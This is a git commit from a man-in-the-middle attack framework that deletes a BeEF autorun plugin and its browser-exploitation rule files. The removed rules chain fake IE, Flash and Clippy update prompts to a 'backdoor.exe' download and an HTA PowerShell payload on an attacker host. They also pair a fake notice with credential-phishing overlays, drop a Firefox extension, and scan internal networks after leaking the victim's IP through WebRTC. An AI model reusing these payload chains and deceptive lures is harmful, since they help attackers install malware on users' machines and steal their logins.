Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine

removed check to enable IP forwarding using sysctl
2025-07-16 10:03:52 -07:00 · 2015-08-23 01:33:16 +02:00 · 2015-08-23 01:33:16 +02:00 · 24070afbd0
commit 24070afbd0
parent 77fc00539e
11 changed files with 4 additions and 300 deletions
--- a/config/beef_arerules/c_osx_test-return-mods.json
+++ b/config/beef_arerules/c_osx_test-return-mods.json
@ -1,35 +0,0 @@
-{
-  "name": "Test return debug stuff",
-  "author": "antisnatchor",
-  "browser": "S",
-  "browser_version": ">= 7",
-  "os": "OSX",
-  "os_version": "<= 10.10",
-  "modules": [{
-    "name": "test_return_ascii_chars",
-    "condition": null,
-    "options": {}
-  }, {
-    "name": "test_return_long_string",
-    "condition": "status==1",
-    "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
-    "options": {
-      "repeat": "10",
-      "repeat_string": "<<mod_input>>"
-    }
-  },
-    {
-      "name": "alert_dialog",
-      "condition": "status=1",
-      "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
-      "options":{"text":"<<mod_input>>"}
-    },
-   {
-    "name": "get_page_html",
-    "condition": null,
-    "options": {}
-  }],
-  "execution_order": [0, 1, 2, 3],
-  "execution_delay": [0, 0, 0, 0],
-  "chain_mode": "nested-forward"
-}
--- a/config/beef_arerules/enabled/.gitignore
+++ b/config/beef_arerules/enabled/.gitignore
@ -1,3 +0,0 @@
-*
-!.gitignore
-!README
--- a/config/beef_arerules/enabled/README
+++ b/config/beef_arerules/enabled/README
@ -1,2 +0,0 @@
-Move here the ARE rule files that you want to load into BeEF.
-Make sure they are .json files (any other file extension is ignored).
--- a/config/beef_arerules/ff_osx_extension-dropper.json
+++ b/config/beef_arerules/ff_osx_extension-dropper.json
@ -1,20 +0,0 @@
-{
-  "name": "Firefox Extension Dropper",
-  "author": "antisnatchor",
-  "browser": "FF",
-  "browser_version": "ALL",
-  "os": "OSX",
-  "os_version": ">= 10.8",
-  "modules": [{
-    "name": "firefox_extension_dropper",
-    "condition": null,
-    "options": {
-      "extension_name": "Ummeneske",
-      "xpi_name": "Ummeneske",
-      "base_host": "http://172.16.45.1:3000"
-    }
-  }],
-  "execution_order": [0],
-  "execution_delay": [0],
-  "chain_mode": "sequential"
-}
--- a/config/beef_arerules/ff_tux_webrtc-internalip.json
+++ b/config/beef_arerules/ff_tux_webrtc-internalip.json
@ -1,28 +0,0 @@
-{"name": "Get Internal IP (WebRTC)",
-  "author": "antisnatchor",
-  "browser": "FF",
-  "browser_version": ">= 31",
-  "os": "Linux",
-  "os_version": "ALL",
-  "modules": [
-    {"name": "get_internal_ip_webrtc",
-      "condition": null,
-      "code": null,
-      "options": {}
-    },
-    {"name": "internal_network_fingerprinting",
-      "condition": "status==1",
-      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
-      "options": {
-        "ipRange":"<<mod_input>>",
-        "ports":"80",
-        "threads":"5",
-        "wait":"2",
-        "timeout":"10"
-      }
-    }
-  ],
-  "execution_order": [0,1],
-  "execution_delay": [0, 0],
-  "chain_mode": "nested-forward"
-}
--- a/config/beef_arerules/ie_win_fakenotification-clippy.json
+++ b/config/beef_arerules/ie_win_fakenotification-clippy.json
@ -1,31 +0,0 @@
-{
-  "name": "Ie Fake Notification + Clippy",
-  "author": "antisnatchor",
-  "browser": "IE",
-  "browser_version": "== 11",
-  "os": "Windows",
-  "os_version": ">= 7",
-  "modules": [
-    {
-      "name": "fake_notification_ie",
-      "condition": null,
-      "options": {
-        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
-      }
-    }
-  ,{
-      "name": "clippy",
-      "condition": null,
-      "options": {
-        "clippydir": "http://172.16.45.1:3000/clippy/",
-        "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
-        "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
-        "respawntime":"5000",
-        "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
-      }
-    }
-  ],
-  "execution_order": [0,1],
-  "execution_delay": [0,2000],
-  "chain_mode": "sequential"
-}
--- a/config/beef_arerules/ie_win_htapowershell.json
+++ b/config/beef_arerules/ie_win_htapowershell.json
@ -1,27 +0,0 @@
-{
-  "name": "HTA PowerShell",
-  "author": "antisnatchor",
-  "browser": "IE",
-  "browser_version": "ALL",
-  "os": "Windows",
-  "os_version": ">= 7",
-  "modules": [
-    {
-      "name": "fake_notification_ie",
-      "condition": null,
-      "options": {
-        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
-      }
-    },
-    {
-      "name": "hta_powershell",
-      "condition": null,
-      "options": {
-        "domain":"http://172.16.45.1:3000",
-        "ps_url":"/ps"
-      }
-    }],
-  "execution_order": [0,1],
-  "execution_delay": [0,500],
-  "chain_mode": "sequential"
-}
--- a/config/beef_arerules/ie_win_missingflash-prettytheft.json
+++ b/config/beef_arerules/ie_win_missingflash-prettytheft.json
@ -1,27 +0,0 @@
-{
-  "name": "Fake missing plugin + Pretty Theft LinkedIn",
-  "author": "antisnatchor",
-  "browser": "IE",
-  "browser_version": ">= 8",
-  "os": "Windows",
-  "os_version": "== XP",
-  "modules": [{
-    "name": "fake_notification_c",
-    "condition": null,
-    "options": {
-      "url": "http://172.16.45.1:3000/updates/backdoor.exe",
-      "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
-    }
-  }, {
-    "name": "pretty_theft",
-    "condition": null,
-    "options": {
-      "choice": "Windows",
-      "backing": "Grey",
-      "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
-    }
-  }],
-  "execution_order": [0, 1],
-  "execution_delay": [0, 5000],
-  "chain_mode": "sequential"
-}
--- a/config/beef_arerules/ie_win_test-return-mods.json
+++ b/config/beef_arerules/ie_win_test-return-mods.json
@ -1,35 +0,0 @@
-{
-  "name": "Test return debug stuff",
-  "author": "antisnatchor",
-  "browser": "IE",
-  "browser_version": "<= 8",
-  "os": "Windows",
-  "os_version": ">= XP",
-  "modules": [{
-    "name": "test_return_ascii_chars",
-    "condition": null,
-    "options": {}
-  }, {
-    "name": "test_return_long_string",
-    "condition": "status==1",
-    "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
-    "options": {
-      "repeat": "10",
-      "repeat_string": "<<mod_input>>"
-    }
-  },
-    {
-      "name": "alert_dialog",
-      "condition": "status=1",
-      "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
-      "options":{"text":"<<mod_input>>"}
-    },
-   {
-    "name": "get_page_html",
-    "condition": null,
-    "options": {}
-  }],
-  "execution_order": [0, 1, 2, 3],
-  "execution_delay": [0, 0, 0, 0],
-  "chain_mode": "nested-forward"
-}
--- a/core/utils.py
+++ b/core/utils.py
@ -21,7 +21,6 @@ import logging
 import re
 import sys

-from commands import getstatusoutput
 from core.logger import logger
 from core.proxyplugins import ProxyPlugins
 from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
@ -35,11 +34,6 @@ def shutdown(message=None):
    sys.exit(message)

 def set_ip_forwarding(value):
-    status, result = getstatusoutput('sysctl --help')
-    if status == 0:
-        log.debug("Setting ip forwarding to {} using sysctl".format(value))
-        os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX
-    else:
    log.debug("Setting ip forwarding to {}".format(value))
    with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
        file.write(str(value))
--- a/plugins/beefautorun.py
+++ b/plugins/beefautorun.py
@ -1,82 +0,0 @@
-#!/usr/bin/env python2.7
-
-# Copyright (c) 2014-2016 Marcello Salvati
-#
-# This program is free software; you can redistribute it and/or
-# modify it under the terms of the GNU General Public License as
-# published by the Free Software Foundation; either version 3 of the
-# License, or (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
-# USA
-#
-import os
-import pyinotify
-
-from plugins.plugin import Plugin
-from plugins.inject import Inject
-from core.beefapi import BeefAPI
-
-class BeefAutorun(Inject, Plugin):
-    name     = "BeEFAutoloader"
-    optname  = "beefauto"
-    desc     = "Injects BeEF hooks & manages BeEF's ARE rule loading"
-    version  = "0.4"
-
-    def initialize(self, options):
-        self.options    = options
-        self.ip_address = options.ip
-        beefconfig = self.config['MITMf']['BeEF']
-
-        Inject.initialize(self, options)
-        self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
-
-        beefconfig = self.config['MITMf']['BeEF']
-
-        from core.utils import shutdown
-        beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
-        if not beef.login(beefconfig['user'], beefconfig['pass']):
-            shutdown("[BeEFAutorun] Error logging in to BeEF!")
-
-        self.tree_info.append('Starting RuleWatcher')
-        RuleWatcher(beef, self.log).start()
-
-    def options(self, options):
-        pass
-
-class RuleWatcher(pyinotify.ProcessEvent):
-
-    def __init__(self, beef, logger):
-        pyinotify.ProcessEvent.__init__(self)
-        self.beef = beef
-        self.log  = logger
-
-    def process_IN_MODIFY(self, event):
-        self.log.debug('Detected ARE rule change!')
-        for rule in self.beef.are_rules.list():
-            self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
-            rule.delete()
-
-        if event.src_path.endswith('.json'):
-            self.log.debug('Detected ARE rule modification/addition!')
-            for rule in os.listdir('./config/beef_arerules/enabled'):
-                if rule.endswith('.json'):
-                    rule_path = './config/beef_arerules/enabled/' + rule
-                    self.log.debug('Adding rule {}'.format(rule_path))
-                    self.beef.are_rules.add(rule_path)
-
-    def start(self):
-        wm = pyinotify.WatchManager()
-        wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY)
-        notifier = pyinotify.Notifier(wm, self)
-
-        t = threading.Thread(name='RuleWatcher', target=notifier.loop)
-        t.setDaemon(True)
-        t.start()